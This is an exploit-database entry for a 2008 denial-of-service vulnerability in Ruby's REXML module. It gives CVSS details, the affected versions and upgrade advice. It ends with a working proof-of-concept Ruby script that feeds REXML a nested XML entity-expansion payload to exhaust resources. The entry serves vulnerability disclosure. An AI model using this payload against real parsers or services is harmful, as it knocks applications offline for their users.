Ruby REXML Module Remote Denial of Service Vulnerability

vendor:

Ruby

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Denial of Service

400

CWE

Product Name: Ruby

Affected Version From: Ruby 1.9.0-3

Affected Version To: Ruby 1.9.0-3

Patch Exists: YES

Related CWE: N/A

CPE: a:ruby:ruby

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ruby REXML Module Remote Denial of Service Vulnerability

Ruby is prone to a remote denial-of-service vulnerability in its REXML module. Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.

Mitigation:

Upgrade to the latest version of Ruby.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30802/info

Ruby is prone to a remote denial-of-service vulnerability in its REXML module.

Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.

Versions up to and including Ruby 1.9.0-3 are vulnerable. 

#!/usr/bin/env ruby
require 'rexml/document'

doc = REXML::Document.new(<<END)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
END

puts doc.root.text.size